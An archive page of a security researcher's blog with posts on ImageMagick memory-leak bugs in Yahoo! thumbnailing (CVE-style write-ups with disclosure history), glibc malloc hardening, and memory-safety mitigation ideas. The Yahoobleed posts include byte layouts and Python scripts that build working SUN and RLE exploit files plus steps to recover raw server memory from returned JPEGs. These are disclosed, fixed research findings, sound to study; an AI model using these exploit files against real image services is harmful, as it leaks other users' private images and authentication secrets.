Friday, May 19, 2017

*bleed, more powerful: dumping Yahoo! authentication secrets with an out-of-bounds read


In my previous post on Yahoobleed #1 (YB1), we saw how an uninitialized memory vulnerability could lead to disclosure of private images belonging to other users. The resulting leaked memory bytes were subject to JPEG compression, which is not a problem for image theft, but is somewhat lacking if we wanted to steal memory content other than images.

In this post, we explore an alternative *bleed class vulnerability in Yahoo! thumbnailing servers. Let's call it Yahoobleed #2 (YB2). We'll get around the (still present) JPEG compression issue to exfiltrate raw memory bytes. With subsequent usage of the elite cyberhacking tool "strings", we discover many wonders.

Yahoo! fixed YB2 at the same time as YB1, by retiring ImageMagick. See my previous post for a more detailed list of why Yahoo! generally hit this out of the park with their response.


The above patch of noise is a PNG (i.e. lossless) and zoomed rendering of a 64x4 subsection of a JPEG image returned from Yahoo! servers when we trigger the vulnerability.

There are many interesting things to note about this image, but for now we'll observe that... is that a couple of pointers we see at the top?? I have a previous Project Zero post about pointer visualization and once you've seen a few pointers, it gets pretty easy to spot them across a variety of leak situations. Well, at least for Linux x86_64, where pointers often have a common prefix of 0x00007f. The hallmarks of the pointers above are:
  • Repeating similar structures with the same alignment (8 bytes on 64-bit).
  • In blocks of pointers, vertical stripes of white towards where the most significant bytes are aligned, representing 0x00. (Note that the format of the leaked bytes is essentially "negated" because of the input file format.)
  • Again in blocks of pointers, vertical stripes of black next to that, representing 7 bits set in a row of the 0x7f value.
  • And again in blocks of pointers, a thin vertical stripe of white next to that, representing the 1 bit not set in the 0x7f value.
But we still see JPEG compression artifacts. Will that be a problem for precise byte-by-byte data exfiltration? We'll get to it later.

The vulnerability

The hunt for this vulnerability starts with the realization that we don't know whether Yahoo! is running an up-to-date ImageMagick or not. Given that we know Yahoo! supports the RLE format, perhaps we can use the same test files outlined in my previous post on RLE memory corruption. Interestingly enough, the crash file doesn't seem to crash anything, but all the test files do seem to render instead of failing cleanly as would be expected with an up-to-date ImageMagick. After some pondering, the most likely explanation is that the Yahoo! ImageMagick is indeed old and vulnerable, but the different heap setup we learned about with YB1 means that the out-of-bounds heap write test case has no effect due to alignment slop.

To test this hypothesis, we make an out-of-bounds heap write RLE file that substantially overflows a smaller chunk (64 bytes, with a 16 byte or so overflow), and upload that to Yahoo!
And sure enough, hitting the thumbnail fetch URL fairly reliably (50% or so) results in:

This looks like a very significant backend failure, and our best guess is a SIGSEGV due to the presence of the 2+ years old RLE memory corruption issue.

But our goal today is not to exploit an RCE memory corruption, although that would be fun. Our goal is to exfiltrate data with a *bleed attack. So, we have an ImageMagick that is about 2.5 years old. In that timeframe, surely lots of other interesting vulnerabilities have been fixed? After a bit of looking around, we settle on an interesting candidate: this 2+ years old out-of-bounds fix in the SUN decoder. The bug fix appears to be taking a length check and applying it more thoroughly so that it includes images with a bit depth of 1. Looking at the code slightly before this patch, and tracing through the decode path for an image with a bit depth of 1, we get (coders/sun.c):

    number_pixels=(MagickSizeType) image->columns*image->rows;
    if ((sun_info.type != RT_ENCODED) && (sun_info.depth >= 8) &&
        ((number_pixels*((sun_info.depth+7)/8)) > sun_info.length))
      /* ... rejects the file; never reached for depth == 1 ... */
    sun_data=(unsigned char *) AcquireQuantumMemory((size_t) sun_info.length, /* ... */
    count=(ssize_t) ReadBlob(image,sun_info.length,sun_data);
    if (count != (ssize_t) sun_info.length)
      /* ... */

    if (sun_info.depth == 1)
      for (y=0; y < (ssize_t) image->rows; y++)
        /* ... */
        if (q == (Quantum *) NULL)
          /* ... */
        for (x=0; x < ((ssize_t) image->columns-7); x+=8)
          for (bit=7; bit >= 0; bit--)
            SetPixelIndex(image,(Quantum) ((*p) & (0x01 << bit) ? 0x00 : 0x01), /* ... */

So in the case of an image with a depth of 1, we see a fairly straightforward problem:
  • Let's say we have width=256, height=256, depth=1, length=8.
  • Image of depth 1 bypasses check of number_pixels against sun_info.length.
  • sun_data is allocated to be a buffer of 8 bytes, and 8 bytes are read from the input file.
  • Decode of 1 bit per pixel image proceeds. (256*256)/8 == 8192 bytes are required in sun_data but only 8 are present.
  • Massive out-of-bounds read ensues; rendered image is based largely on out-of-bounds memory.
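The arithmetic in the steps above can be checked with a small Python model. To be clear, this is not ImageMagick code; it just mirrors the vulnerable check and the decoder's actual appetite, with the constants from the walkthrough:

```python
# Model of the pre-patch sun.c length check and the 1 bpp decode's real needs.
# RT_ENCODED is 2 in the SUN raster format; our file uses type 1 (standard).
RT_ENCODED = 2

def length_check_rejects(columns, rows, depth, image_type, length):
    """The vulnerable check: only ever applied when depth >= 8."""
    number_pixels = columns * rows
    return (image_type != RT_ENCODED and depth >= 8 and
            number_pixels * ((depth + 7) // 8) > length)

columns, rows, depth, length = 256, 256, 1, 8

# depth == 1 slips past the check entirely...
assert not length_check_rejects(columns, rows, depth, 1, length)

# ...but the 1 bit per pixel decode loop needs (256*256)/8 bytes of input:
bytes_needed = (columns * rows) // 8
print(bytes_needed)   # 8192 bytes required, only 8 allocated
```

The gap between 8192 bytes required and 8 bytes allocated is the massive out-of-bounds read.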

The exploit

The exploit SUN file is only 40 bytes, so we might as well show a gratuitous screenshot of the file in a hex editor, and then dissect the exact meaning of each byte:

59 A6 6A 95:             header
00 00 01 00 00 00 01 00: image dimensions 256 x 256
00 00 00 01:             image depth 1 bit per pixel
00 00 00 08:             image data length 8
00 00 00 01:             image type 1: standard
00 00 00 00 00 00 00 00: map type none, length 0
41 41 41 41 41 41 41 41: 8 bytes of image data
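For reproducibility, here's a sketch that assembles those 40 bytes with Python's struct module. The field layout follows the dissection above (all header fields are 32-bit big-endian words); the output filename is arbitrary:

```python
import struct

RAS_MAGIC = 0x59A66A95   # 59 A6 6A 95
RT_STANDARD = 1

header = struct.pack(
    '>IIIIIIII',
    RAS_MAGIC,
    256,            # width
    256,            # height
    1,              # depth: 1 bit per pixel
    8,              # image data length: far too small for a 256x256x1 image
    RT_STANDARD,    # image type 1: standard
    0,              # map type: none
    0)              # map length: 0
exploit = header + b'A' * 8   # 8 bytes of "image data"

assert len(exploit) == 40
with open('exploit.sun', 'wb') as f:
    f.write(exploit)
```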

The most interesting variable we can twiddle in this exploit file is the image data length. As long as we keep it smaller than (256 * 256) / 8, we'll get the out-of-bounds read. But where will this out-of-bounds read start? It will start from the end of the allocation of the image data. By changing the size of the image data, we may end up occupying different relative locations within the heap area (perhaps more towards the beginning or end with certain sizes). This flexibility gives us a greater chance of being able to read something interesting.


The exfiltration

Exfiltration is where the true usefulness of this exploit becomes apparent. As noted above in the visualization section, the result of our exfiltration attempt is a JPEG compressed file. We actually get a greyscale JPEG image out of ImageMagick, since the 1 bit per pixel SUN file generates a black and white drawing. A greyscale JPEG is a good start for reliable exfiltration, because JPEG compression is designed to hack human perception. Human vision is more sensitive to brightness than it is to actual color, so color data is typically compressed more lossily than brightness data. (This is achieved via the YCbCr colorspace.) But with greyscale JPEGs there is only brightness.

But looking at the exfiltrated JPEG image above, we still see JPEG compression artifacts. Are we doomed? Actually, no. Since our SUN image was chosen to be a 1 bit per pixel (black or white) image, then we only need to preserve 1 bit of accurate entropy per pixel in the exfiltrated JPEG file! Although some of the white pixels are a little bit light grey instead of fully white, and some of the black pixels are a little bit dark grey instead of fully black, each pixel is still very close to black or white. I don't have a mathematical proof of course, but it appears that for the level of JPEG compression used by the Yahoo! servers, every pixel has its 1 bit of entropy intact. The most deviant pixels from white still appear to be about 85% white (i.e. very light grey) whereas the threshold for information loss would of course be 50% or below.
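That 50% threshold recovery can be sketched in a few lines of Python. The pixel values below are made up to show the idea: nothing is pure black or white after JPEG compression, but every pixel is still on the right side of the threshold, so the original bit survives. The "dark pixel means set bit" negation follows the convention noted earlier:

```python
def recover_bytes(gray_pixels):
    """Threshold 8-bit grayscale pixels at 50%, negate, pack 8 pixels per byte."""
    out = bytearray()
    for i in range(0, len(gray_pixels) - 7, 8):
        b = 0
        for bit, px in enumerate(gray_pixels[i:i + 8]):
            dark = px < 128            # 50% threshold eats the JPEG noise
            b |= dark << (7 - bit)     # negate: dark pixel -> set bit
        out.append(b)
    return bytes(out)

# Made-up noisy pixels: light greys stay 0 bits, dark greys stay 1 bits.
pixels = [12, 30, 220, 240, 7, 250, 15, 230,
          245, 10, 225, 20, 235, 5, 218, 25]
print(recover_bytes(pixels).hex())   # -> ca55
```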

We can attempt to recover raw bytes from the JPEG file with an ImageMagick conversion command like this:

convert yahoo_file.jpg -threshold 50% -depth 1 -negate out.gray

For the JPEG file at the top of this post, the resulting recovered original raw memory bytes are:

0000000 d0 f0 75 9b 83 7f 00 00 50 33 76 9b 83 7f 00 00
0000020 31 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00

Those pointers, 0x00007f839b75f0d0 and 0x00007f839b763350, look spot on.
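As a quick sanity check, unpacking the first 16 recovered bytes as little-endian 64-bit values gives back exactly those pointers, complete with the 0x00007f prefix heuristic from earlier:

```python
import struct

# First 16 bytes of recovered memory, as dumped above.
recovered = bytes.fromhex('d0f0759b837f0000' '5033769b837f0000')
ptrs = struct.unpack('<QQ', recovered)
print([hex(p) for p in ptrs])   # -> ['0x7f839b75f0d0', '0x7f839b763350']

# Both match the Linux x86_64 user-space pointer fingerprint.
assert all(p >> 40 == 0x7f for p in ptrs)
```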

The strings and secrets

So now that we have a reliable and likely byte-perfect exfiltration primitive, what are some interesting strings in the memory space of the Yahoo! thumbnail server? With appropriate redactions representing long, high-entropy strings:

SSLCOOKIE: SSL=v=1&s=redacted&kv=0

Yahoo-App-Auth: v=1;;h=;t=redacted;k=4;s=redacted

Yeah, it's looking pretty serious.

In terms of interesting strings other than session secrets, etc., what else did we see? Most usefully, there are some paths, error messages and version strings that would appear to offer a very precise determination that indeed, ImageMagick is here and indeed, it is dangerously old:

ImageMagick 6.8.9-6 Q16 x86_64 2014-07-25
unrecognized PerlMagick method

Obviously, these strings made for a much more convincing bug report. Also note the PerlMagick reference. I'm not familiar with PerlMagick but perhaps PerlMagick leads to an in-process ImageMagick, which is why our out-of-bounds image data reads can read so much interesting stuff.


Conclusions

This was fun. We found a leak that encoded only a small amount of data per JPEG compressed pixel returned to us, allowing us to reliably reconstruct original bytes of exfiltrated server memory.

The combination of running an ImageMagick that is both old and also unrestricted in the enabled decoders is dangerous. The fix of retiring ImageMagick should take care of both those issues :)

Thursday, May 18, 2017

*bleed continues: 18 byte file, $14k bounty, for leaking private Yahoo! Mail images


*bleed attacks are hot right now. Most notably, there's been Heartbleed and Cloudbleed. In both cases, out-of-bounds reads in server side code resulted in private server memory content being returned to clients. This leaked sensitive secrets from the server process' memory space, such as keys, tokens, cookies, etc. There was also a recent client-side bleed in Microsoft's image libraries, exposed through Internet Explorer. One of the reasons *bleed attacks are interesting is that they are not affected by most sandboxing, and they are relatively easy to exploit.

Presented here is Yahoobleed #1 (YB1), a way to slurp other users' private Yahoo! Mail image attachments from Yahoo servers.

YB1 abuses an 0-day I found in the ImageMagick image processing software. This vulnerability is now a so-called 1-day, because I promptly reported it to upstream ImageMagick and provided a 1-line patch to resolve the issue, which landed here. You can refer to it as CESA-2017-0002.

The previous *bleed vulnerabilities have typically been out-of-bounds reads, but this one is the use of uninitialized memory. An uninitialized image decode buffer is used as the basis for an image rendered back to the client. This leaks server side memory. This type of vulnerability is fairly stealthy compared to an out-of-bounds read because the server will never crash. However, the leaked secrets will be limited to those present in freed heap chunks.

Yahoo! response

The Yahoo! response has been one of the best I've seen. In order:
  1. They have a bug bounty program, which encourages and rewards security research and fosters positive hacker relations, etc.
  2. Upon receiving a bug, they impose a 90-day response deadline on themselves. This is very progressive and the polar opposite of e.g. Microsoft, who occasionally like to turn reasonable disclosure deadlines into a pointless fight.
  3. And indeed the bug was fixed well within 90 days.
  4. The communication was excellent, even when I was sending far too many ping requests.
  5. The fix was particularly thorough: ImageMagick was retired.
  6. A robust bounty of $14,000 was issued (for this combined with a similar issue, to be documented separately). $778 per byte -- lol!
  7. I'm donating this reward to charity. Upon being asked about charitable matching, Yahoo! accepted a suggestion to match (i.e. double) the reward to $28,000.
  8. :sunglasses_like_a_boss:

The attack vector for these demos was to attach the 18-byte exploit file (or a variant) as a Yahoo! Mail attachment, send it to myself, and then click on the image in the received mail to launch the image preview pane. The resulting JPEG image served to my browser is based on uninitialized, or previously freed, memory content.

The following three images have had entropy stripped from them via a variety of transforms. Originals have been destroyed.

In image #1, you can see the capital letter A inside a black circle. Imagine suddenly and unexpectedly seeing this in a returned image while investigating a vulnerability you expected to be boring! There are various possible reasons for the repeated nature of the recovered image -- assuming the original in-memory image does not itself repeat.

Most obviously, the in-memory image dimensions probably don't match the dimensions of our uninitialized canvas, 1024x1024 in this particular case. Depending on how the in-memory image is stored, this will lead to repetition and / or offsetting, both of which are seen here.
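To illustrate the offsetting effect with hypothetical numbers: if the leaked in-memory image were, say, 600 pixels wide but gets read out as 1024-pixel display rows, each successive row starts at a different column of the source image, producing the diagonal shifting and eventual repetition:

```python
# Hypothetical widths: our uninitialized canvas vs the leaked in-memory image.
display_w, source_w = 1024, 600

# Source column at which each displayed row begins: drifts row by row.
offsets = [(row * display_w) % source_w for row in range(4)]
print(offsets)   # each display row starts at a different source column
```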

Also, the in-memory image representation might not match the colorspace, channel order or alpha channel status (yes or no) of the uninitialized RLE decode canvas. The thumbnail decode and re-encode pipeline will leave all sorts of different in-memory artifacts in the course of doing its job.

Don't be in any doubt though: correct reconstruction of the original image would be possible, but that's a non-goal.

In image #2, you might still be able to make out the remains of a human face. Perhaps a forehead, perhaps a nose and even a forehead and cheekbone? Or maybe not, because of the stripping of entropy and transforms applied. But you can appreciate that at the time, seeing a random face was a shock and illustrated the severity of the leak. At that point, I ceased, desisted, destroyed all files based on uninitialized memory and reported the bug.

In image #3, the color has been left in because the image shows interesting vertical bands of magenta, cyan and yellow. What in-memory structure leads to this pattern? I have no idea. At first I was thinking some CMYK colorspace representation but I don't think that makes sense. JPEGs are typically coded in the YCbCr colorspace, so perhaps a partially encoded or decoded JPEG is involved.

The vulnerability

The vulnerability exists in the obscure RLE (Utah Raster Toolkit Run Length Encoded) image format, which previously featured in my blog post noting RLE memory corruption. The new ImageMagick 0-day is in this code snippet, from coders/rle.c:

    pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);
    /* ... */
    if ((flags & 0x01) && !(flags & 0x02))
      {
        /* Set background color. */
        for (i=0; i < (ssize_t) number_pixels; i++)
          /* ... */
          for (j=0; j < (ssize_t) (number_planes-1); j++)
            *p++=0;  /* initialize matte channel */
      }
    /* Read runlength-encoded image. */
    do
      {
        /* ... */
        switch (opcode & 0x3f)
          /* ... */
      } while (((opcode & 0x3f) != EOFOp) && (opcode != EOF));

It's a tricky vulnerability to spot because of the abstraction and also because this is a vulnerability caused by the absence of a necessary line of code, not the presence of a buggy line of code. The logic is approximately:
  1. Allocate a suitably sized canvas for the image decode. Note that the GetVirtualMemoryBlob call does NOT guarantee zero-filled memory, as you would expect if it were backed by mmap(). It's just backed by malloc().
  2. Depending on some image header flags, either initialize the canvas to a background color, or don't.
  3. Iterate a loop of RLE protocol commands, which may be long or may be empty.
  4. After this code snippet, the decoded canvas is handed back to the ImageMagick pipeline for whatever processing is underway.
As you can now see, the attacker could simply create an RLE image that has header flags that do not request canvas initialization, followed by an empty list of RLE protocol commands. This will result in an uninitialized canvas being used as the result of the image decode. Here's an RLE file that accomplishes just that. It's just 18 bytes!

And these 18 bytes parse as follows:

52 CC:       header
00 00 00 00: top, left at 0x0.
00 04 00 04: image dimensions 1024 x 1024
02:          flags 0x02 (no background color)
01:          1 plane (i.e. grayscale image)
08:          8 bits per sample
00 00 00:    no color maps, 0 colormap length, padding
07:          end of image (a protocol command is consumed pre-loop)
07:          end of image (end the decode loop for real)
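A sketch of assembling those 18 bytes with Python's struct module, following the dissection above (the URT RLE header is little-endian: a 16-bit magic then four 16-bit position/size fields; the filename is arbitrary):

```python
import struct

header = struct.pack('<HHHHH',
                     0xCC52,   # magic: "52 CC" on disk
                     0,        # xpos (left)
                     0,        # ypos (top)
                     1024,     # xsize
                     1024)     # ysize
body = bytes([
    0x02,               # flags: 0x02 = no background color
    0x01,               # 1 plane (i.e. grayscale image)
    0x08,               # 8 bits per sample
    0x00, 0x00, 0x00,   # no color maps, 0 colormap length, padding
    0x07,               # end of image (a protocol command is consumed pre-loop)
    0x07,               # end of image (ends the decode loop for real)
])
exploit = header + body

assert len(exploit) == 18
with open('exploit.rle', 'wb') as f:
    f.write(exploit)
```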

There are a few bytes that are important for experimenting with exploitation: the number of planes (i.e. a choice between a greyscale vs. a color image), and the image dimensions, which determine the size of the uninitialized malloc() chunk.


Exploitation

Exploitation is an interesting discussion. Here are some of the factors that affect exploitation of this vulnerability, both generally and in the Yahoo! case specifically:
  • Decoder lockdown. Yahoo! did not appear to implement any form of whitelisting for only sane ImageMagick decoders. RLE is not a sane decoder on the modern web. Anyone using ImageMagick really needs to lock down the decoder list to just the ones needed.
  • Sandboxing. As noted above, sandboxing doesn't have much of an effect on this vulnerability type. Although it doesn't make much difference, my best guess is that the server in question might be using Perl and PerlMagick, as well as handling various network traffic, suggesting that a tight sandbox policy is difficult without extensive refactoring.
  • Process isolation. This is critical. *bleed bugs for most usages of ImageMagick are mostly harmless because it's typical to kick off e.g. a thumbnail request by launching the ImageMagick convert binary, once per thumbnail request. This means that the process memory space of the exploited process is only likely to contain the attacker's image data, making exploitation much less interesting (but not irrelevant as we saw in my recent Box and DropBox blog posts).
    The Yahoo! Mail process which is handling thumbnailing has an unusual property, though: it appears to be long lived and to process images from a variety of different users. Suddenly, a memory content leak is a very serious vulnerability.
  • Heap implementation. The heap implementation used is significant. For the input RLE file decomposed above, the canvas allocation is 1024 x 1024 x 4, or 4MB. This is a large allocation, and for example, the default malloc() tuning on Linux x86_64 leads to such a large allocation being satisfied by mmap(), which zero-fills memory and will not lead to interesting memory content leakage! However, we definitely see leaked heap content with such a large allocation in the Yahoo! context, so a non-default heap setup is clearly in use. With our ability to leak heap content, we could likely fingerprint the exact heap implementation if we cared to do so. Who knows, maybe we'd find tcmalloc or jemalloc, both popular allocators with large service providers.
  • Thumbnail dimensions. It's worth a brief note on thumbnail dimensions. If we're in a situation where our uninitialized canvas gets resized down to a smaller thumbnail, this would compress out detail from the original leaked memory content. This would spoil certain exploitation attempts. However, Yahoo! Mail's preview panel seems to display very large images (tested to 2048x2048) verbatim, so no worries here.
  • Thumbnail compression. This one is interesting. Yahoo! Mail returns thumbnails and image previews as JPEG images. As we know, JPEG compression is lossy. This is not a particular issue if we're only interested in pulling image data out of Yahoo! servers. But if we're interested in looking at raw bytes of Yahoo! server memory, then lossy compression is losing us data.
    As an example of this, I tried to extract concrete pointer values from memory dumps -- perhaps we want to remotely defeat ASLR? I used greyscale images because JPEG compresses color data more than it compresses intensity data. But still, with a 16-byte sized data exfiltration I see pointer values such as 0x020081c5b0be476f and 0x00027c661ac2722a. Hmm. You can see that these may be trying to be Linux x86_64 user space pointers (0x00007f....) but there's a lot of information loss there.
    I think it would be possible to overcome this exfiltration problem. Most likely, there's some thumbnailing endpoint that returns (or can be asked to return with some URL parameter) lossless PNG images, which would do the trick. Or for the brave, mathematical modelling of JPEG compression??


Conclusions

Broadly: in a world of decreasing memory corruption and increasing sandboxing, *bleed bugs provide a compelling option for easily stealing information from servers.

On design: taking a long running process and linking in ImageMagick as a library has to be a discouraged design choice, as it takes bugs that might not be very serious and makes them very serious indeed. Limiting ImageMagick decoders to a minimal required set is a must for any processing of untrusted input.

GraphicsMagick vs. ImageMagick, again. Well, well, look at this :) GraphicsMagick fixed this issue in March 2016, for the v1.3.24 release, tucked away in a changeset titled "Fix SourceForge bug #371 "out-of-bounds read in coders/rle.c:633:39"" (see the second memset()). This is another case where tons of vulnerabilities are being found and fixed in both GraphicsMagick and ImageMagick with little co-ordination. This seems like a waste of effort and a risk of 0-day (or is it 1-day?) exposure. It goes both ways: the RLE memory corruption I referenced in my previous blog post was only fixed in GraphicsMagick in March 2016, having been previously fixed in ImageMagick in Dec 2014.

Linux distributions. This vulnerability is now 1-day in the sense that it is broadly unpatched by entities that repackage upstream ImageMagick, such as Linux distributions. (As a side note, it's worth noting that the RLE decoder in Ubuntu 16.04 LTS is totally borked due to a bogus check that can be seen getting removed here.)

But most significantly for this conclusion, I wanted to highlight some questions about ecosystem responsibility.
Researcher responsibility: what is a researcher's responsibility and where does it end? As a researcher who becomes aware of a software risk, I believe I have a responsibility to let the "owner" of that software immediately know about the issue and the fact that I think it's a security risk. Let's assume that the owner makes a fix in a reasonable time. Are we good now? Well, what about all the downstream usages (eventually cascading to end users) that don't yet have the fix? So is it my responsibility to go and find and harangue every cloud provider that is affected? No, probably not. We might let one or two providers with bounty programs know as a positive feedback for encouraging security research, but the broader problem remains.
Upstream vendor responsibility: how should the upstream vendor respond to a security report other than identifying it (if not already clearly flagged) and fixing it promptly? Personally, I think there should be some form of notification in a well defined place (mailing list; web site announcement area; etc.) and the upstream vendor could also take the burden of getting the CVE.
Consumer responsibility: what should consumers such as Yahoo!, Box, DropBox, Ubuntu, etc. do? Well, if the upstream vendor is doing a good job, the consumer security teams can all be subscribed to the same authoritative source and take action whenever a new announcement is made. (Probably less trivial than it sounds; both Box and Yahoo! appear to have been running old versions of ImageMagick with known vulnerabilities.)

Wednesday, May 17, 2017

Further hardening glibc malloc() against single byte overflows


Back in 2014, while at Project Zero, I exploited a buffer overflow of a single NUL byte in glibc. Tavis Ormandy had found the interesting glibc vulnerability but there was skepticism in the Linux community that this was exploitable. The only thing to do was to write an exploit. (Was this really 3 years ago? How time flies!)

As part of warming up to write the exploit, I created a few sample test C files which explored different interesting glibc malloc() side effects after an off-by-one NUL byte write. You can find them here. The exploit abused a situation similar to consolidate_forward.c, but did not need to thoroughly defeat ASLR because the target platform was 32-bit.

I also noted a curiosity for future research in shrink_free_hole_alloc_overlap_consolidate_backward.c: there's a possible sequence triggered by a NUL byte overwrite whereby ASLR can be cleanly defeated to leave aliased heap chunks. The C file is commented if you want to see how the sequence works.

Interestingly enough, this technique turned up in a December 2016 Project Zero guest post describing a Chrome OS exploit chain. In a fantastic piece of work, attributed anonymously, a single byte overflow of the value \x01 is used to fully defeat ASLR and eventually achieve code execution in a 64-bit x86_64 process.

I've been thinking about ways to kill this technique for a while now: it's far too powerful if it can reliably defeat ASLR in a 64-bit process. I also worry that many of the super serious Linux daemon bugs remaining are likely to be of the subtle type, i.e. one byte overflows.

Inline vs. out-of-line metadata

It's time for a brief foray into memory allocator design.

  • glibc malloc. glibc malloc is based on dlmalloc, which has an inline metadata design. Specifically, every buffer handed out to the program is preceded by a little piece of metadata indicating the size of the chunk and whether the previous chunk is free or not.
  • tcmalloc. tcmalloc is an allocator that has a largely out-of-line metadata design, on account of being a bucketing allocator for smaller sizes and a page based allocator for larger sizes. However, the internal metadata for this allocator is mixed in with pages handed out as buffers to the calling program. This was hardened a while ago by Justin Schuh for the Google Chrome web browser; not sure it made it upstream.
  • PartitionAlloc. PartitionAlloc, part of the Google Chrome web browser. It has an out-of-line metadata design such that heap metadata is partitioned or guard paged off from the calling program's buffers. The notable exception, shared with tcmalloc, is freelist pointers, which occupy the freed slots. In PartitionAlloc, freelist pointers are transformed so that dereferencing them faults, and partial pointer overwrites are thwarted.

While writing PartitionAlloc, strictly protected heap metadata was a goal. After all, if the metadata is naturally guarded with guard pages then there's less need for code defenses which are trying to detect and stop bad side effects from metadata corruption. Simplicity wins.

However, there's an interesting interaction with single byte overflows that gives pause for thought and philosophizing.

With an out-of-line metadata design, a single byte overflow off the end of a chunk will hit the first byte of some other chunk. Depending on the different object types that could be in the adjacent chunk, that's potentially a lot of possibilities for the attacker to explore.

With an inline metadata design, a single byte overflow off the end of a chunk will hit some metadata. Depending on the level of metadata corruption checks present, the single byte overflow could be dead in the water as an attacker primitive. However, on the flipside, there's also the possibility for more generic attacks against the metadata, such as the one we are patching up here.

Hardening against the glibc malloc() ASLR defeat

This is one of those cases where a relatively simple patch pops out, but only after some careful thought and analysis.

In this case, the key observation is that there are two linkages between heap chunks in glibc malloc():

  • Freelist pointers. These are doubly linked and the double linkage is already validated. Since pointer values are a "secret" before ASLR is defeated, the attacker cannot fake pointer values before they have defeated ASLR.
  • Lengths. There is also length linkage. For a free chunk, the length is present at both the beginning and the end of the chunk, to enable chunk traversal. Unfortunately, an attacker can craft a fake length easily and problems arise specifically when these lengths are modified to point to valid metadata structures, but not the "correct" metadata structure. Previously there was no length linkage validation.
The solution used was to also validate length linkage when unlinking chunks. It was checked in a while ago, in glibc commit 17f487b7afa7cd6c316040f3e6c86dc96b2eec30.

Now, if the attacker has an off-by-one corruption with a small value (NUL or \x01 - \x07) that hits the lowest significant byte of a length (malloc_chunk->size), the attacker can only use that to cause the length to effectively shrink. This is because all heap chunks are at least 8 bytes under the covers. Shrinking a chunk's length means it will never match the prev_size stored at the end of that chunk. Even if the attacker deploys their one byte overflow multiple times, this new check should always catch them.
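A toy model of that argument, with hypothetical offsets and sizes (this is a sketch, not glibc code): shrinking size by clobbering its low byte means the lookup for the matching prev_size lands short of where the real copy lives, so the new check fails.

```python
# Toy model of the hardened unlink check. A free chunk stores its size at its
# head and again as prev_size at its tail, `size` bytes along.
heap = {}                          # offset -> stored value, standing in for memory
chunk_at, size = 0x100, 0x190      # hypothetical chunk
heap[chunk_at] = size              # size field at the chunk head
heap[chunk_at + size] = size       # prev_size copy at the chunk tail

def unlink_ok(off):
    """The added check: size must match the prev_size found `size` bytes along."""
    s = heap[off]
    return heap.get(off + s) == s

assert unlink_ok(chunk_at)         # intact linkage passes

# An off-by-one NUL write hits the low byte of size: 0x190 -> 0x100. The chunk
# can only shrink, so the check looks in the wrong place and always fails.
heap[chunk_at] = size & ~0xff
assert not unlink_ok(chunk_at)
```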

If an attacker has an arbitrary linear overwrite, they could corrupt both size and prev_size to match, but with that powerful primitive, there would likely be other more fruitful ways forward.


Did we finally nail off-by-one NUL byte overwrites in the glibc heap? Only time will tell!

Monday, May 15, 2017

Are we doing memory corruption mitigations wrong?


Before we get into it, let's start by stating that the progression of memory corruption mitigations over the years has been intensely valuable. The progression of mitigations continues to make exploiting bugs harder and more time consuming. The pool of people who have both the skill and commitment to exploit any given bug (either reliably or at all) is shrinking.

The list of mitigations to credit is long, but includes:

  • Non-executable virtual memory regions.
  • ASLR (address space layout randomization).
  • Stack canaries.
  • Stack variable re-ordering.
  • Heap metadata hardening.
  • Heap partitioning.
  • Control flow integrity (Microsoft CFG, Clang CFI).
  • etc.
The items in the above list have this in common: they target the side effects of memory corruption, as opposed to the memory corruption itself. Some of the side effects targeted are close to the time of the memory corruption, such as a stack canary being checked when a function that caused the corruption returns. Other side effects targeted are potentially very far from the time of the memory corruption, such as control flow integrity on a virtual call, after the attacker has read and written memory arbitrarily.

When targeting side effects of a problem, as opposed to the problem itself, it's often hard to prevent the problem.

I started working on this problem but unfortunately have to put it aside due to other commitments at this time. This blog post documents my thoughts and notes for anyone interested in this problem space.

An alternative?

Should we invest more time in technologies that attempt to stop memory corruption in the first place? I think we should. It's certainly an under researched area.

Let's first clarify that we're talking about defenses for existing C and C++ programs. There are plenty of essays advocating the replacement of C programs with those written in something safer, such as Go. This is a good longer term suggestion but in the shorter term, there's a whole boatload of C legacy that no-one is rushing to move away from.


The main challenge immediately raised when talking about blocking memory corruption at the source is performance. For sure, this is going to be challenging, but here are the tools and situations that may help us:
  • Modern compiler frameworks. A modern compiler framework such as LLVM allows security enhancement transforms to be applied before the optimization passes, so the compiler can lift security checks out of loops, etc.
  • 64-bit processors. Newer processors tend to offer more registers and also "spare" bits in pointer values, both of which may lessen the performance impact of schemes previously tried on 32-bit.
  • New processor instructions. As yet unexplored, but do processor extensions such as Intel MPX offer any paths to thorough yet high performance coverage?
  • Rollback of mitigations. With a C runtime that does not permit buffer bounds to be exceeded, certain mitigations become redundant and can be rolled back. For example, if pointers are bounds checked, there's no urgent need for stack canary checking (which cost a percent or two), because it becomes hard to get the return address corrupted. Likewise for heap metadata hardening and possibly CFI (which also cost a percent or two).
  • Faster heap implementation. Some of the ideas below rely on fast mapping of pointers to heap chunk metadata, such as is done in partitionAlloc() in Chrome. It just so happens that partitionAlloc is faster than almost anything else (including tcmalloc and certainly glibc malloc), so some performance could be clawed back here.
Stricter C / C++ semantics

In the quest for safer compiled C / C++, we might consider placing stricter requirements on the program. For example, while it's already undefined behavior to create certain out-of-bounds pointers, we could compile to a stricter variant of this.

Or, if we decide to dabble in reference counting, it could be mandatory to NULL out all pointer references to a chunk before calling free().

Reserving the top unused bits of 64-bit pointers might also be useful.

Scheme #1: Safe memcpy() with fast pointer lineage checking

This first scheme illustrates that there is some low hanging fruit with moderate impact and trivial performance overhead. Imagine if memcpy() overflow from one heap chunk to another were a thing of the past? It fairly trivially can be.

Imagine a runtime system where the heap implementation is partitionAlloc(). This heap implementation can take an arbitrary pointer that is part way into an allocation chunk, and reliably and quickly return the chunk size, and the chunk pointer base. So you can have a memcpy() that does this (pseudocode):

void* memcpy(void* dst, const void* src, size_t len) {
  char* dst_base;
  char* dst_extent;
  size_t dst_size;

  partitionAllocGetPtrDetails(&dst_base, &dst_size, dst);
  dst_extent = dst_base + dst_size;
  if (len > (size_t)(dst_extent - (char*) dst)) {
    abort();  /* dst chunk would overflow: trap instead of corrupting */
  }
  /* Add a similar check for src, why not. */
  return real_memcpy(dst, src, len);  /* defer to the real copy */
}

Pretty neat huh? However, there are a lot of challenges and polish to apply before this could be 100% awesome:
  • partitionAlloc() currently couldn't provide a working partitionAllocGetPtrDetails() for arbitrary middle-of-chunk pointers inside allocations greater than about 1MB or so. This would need to be fixed, which might require a rejig of where metadata is stored, to be more ASAN-like.
  • You'd need to stop the compiler thinking it knows all about memcpy() and inlining memcpy() for small fixed size values.
